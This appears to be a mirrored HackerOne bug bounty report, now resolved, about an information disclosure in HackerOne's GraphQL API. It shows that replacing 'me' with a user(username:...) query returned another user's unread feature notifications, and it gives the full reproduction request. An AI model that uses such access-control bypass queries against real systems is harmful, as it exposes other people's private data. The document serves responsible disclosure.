Loading HuntDB...

Can read features from any user

Medium
H
HackerOne
Submitted None
Reported by firs0v

Vulnerability Details

Technical details and impact analysis

Information Disclosure
**Summary:** An attacker can read feature notifications from any user. Just need to change `me` to `user(username:"filedescriptor")` in your request to get the features. ### Steps To Reproduce `POST /graphql HTTP/1.1 Host: hackerone.com {"query":"query New_feature {\n query {\n id,\n ...F0\n }\n}\nfragment F0 on Query {\n user(username:\"filedescriptor\") {\n id, username\n, reputation, new_feature_notification {\n name,\n description,\n url,\n id\n }\n },\n id\n}","variables":{}}` ## Impact An attacker can read unread features from any user and have to know how long this user did not visit the hackerone (as example). Probably in future you will make individual feature for individual user. So now it's a bug.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$250.00

Submitted

Weakness

Information Disclosure